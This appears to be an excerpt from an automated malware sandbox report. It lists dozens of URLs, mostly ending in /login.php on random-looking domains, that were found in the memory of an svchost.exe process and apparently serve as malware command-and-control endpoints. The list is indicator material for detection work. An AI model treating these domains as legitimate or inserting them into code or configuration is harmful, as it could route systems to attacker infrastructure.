    Source: svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqypuh.com/login.phpc
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561990237.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574290902.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyqez.com/login.php
    Source: svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2646317504.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2636466156.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2981213123.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2629381703.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyqiw.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2855137197.0000000005F1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613157948.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyres.com/login.php
    Source: svchost.exe, 00000001.00000003.2819905247.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2532568481.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823353061.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822601905.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822384079.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557983438.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2546077981.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534538085.00000000072F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyrib.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2582339927.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gaqyvys.com/login.php
    Source: svchost.exe, 00000001.00000003.2600006940.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593785629.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595314398.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatycis.com/login.php
    Source: svchost.exe, 00000001.00000003.2588996636.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2599492010.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2590187513.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyfuw.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589232221.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577145365.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574096603.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyhos.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795645814.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2793808269.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794122039.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795133904.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795311050.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507273692.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyhub.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832397817.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2828658186.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557275920.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2826870252.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827527666.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832232982.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2827400393.000000000BE82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatykyh.com/login.php
    Source: svchost.exe, 00000001.00000003.2821289704.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557983438.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2546077981.000000000BE0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatypas.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000722F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2768207136.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2761884820.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatypub.com/login.php
    Source: svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613157948.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatypuz.com/login.php
    Source: svchost.exe, 00000001.00000003.2574085789.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571204681.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyqeb.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519971572.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518439898.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519517368.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507955188.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507273692.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyqih.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2830122239.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557983438.000000000BE0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyruw.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyruw.com/login.php/
    Source: svchost.exe, 00000001.00000003.2586486383.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2588833082.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2585306164.00000000072E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyveh.com/
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2825246973.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571760881.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823512755.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572347072.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2581882189.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2557983438.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2546077981.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatyzoz.com/login.php
    Source: svchost.exe, 00000001.00000003.2586486383.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2588833082.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2585306164.00000000072E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygygux.com/
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyjan.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832397817.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574096603.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570797195.0000000005F1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygylur.com/login.php
    Source: svchost.exe, 00000001.00000003.2841115094.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2585304619.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2585044944.000000000738D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygymod.com/
    Source: svchost.exe, 00000001.00000003.2590518762.00000000073DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygymod.com/(.
    Source: svchost.exe, 00000001.00000003.2590518762.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2585304619.00000000073DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygymod.com/H
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528463448.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2822377847.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528177769.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528332201.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygynox.com/login.php
    Source: svchost.exe, 00000001.00000003.2711276062.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2203162819.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2737038256.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2204890012.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2712067298.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygynud.com/login.php
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2534498249.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545030147.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535073122.000000000BE3D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygysen.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577542227.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2573059018.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2580215394.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygytix.com/login.php
    Source: svchost.exe, 00000001.00000003.2506872369.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518441386.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505104494.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2793548404.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508379091.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2507273692.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504460541.000000000734F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygytyd.com/login.php
    Source: svchost.exe, 00000001.00000003.2506872369.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505104494.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508379091.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2504460541.000000000734F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygytyd.com/login.php=
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyvar.com/
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyxad.com/
    Source: svchost.exe, 00000001.00000003.2562078765.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.0000000007389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lygyxad.com/login.php
    Source: svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613157948.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyfax.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770227198.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483450867.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2768207136.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494764466.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771679964.0000000007337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyfen.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyfen.com/login.phpc
    Source: svchost.exe, 00000001.00000003.2600006940.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593785629.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598474329.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595314398.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykygun.com/login.php
    Source: svchost.exe, 00000001.00000003.2841115094.000000000721B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjar.com/
    Source: svchost.exe, 00000001.00000003.2591407589.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2584954171.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2587032429.00000000072A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjar.com/login.php
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykyjux.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577145365.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykylud.com/login.php
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545527847.00000000072A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lykymyr.com/login.php
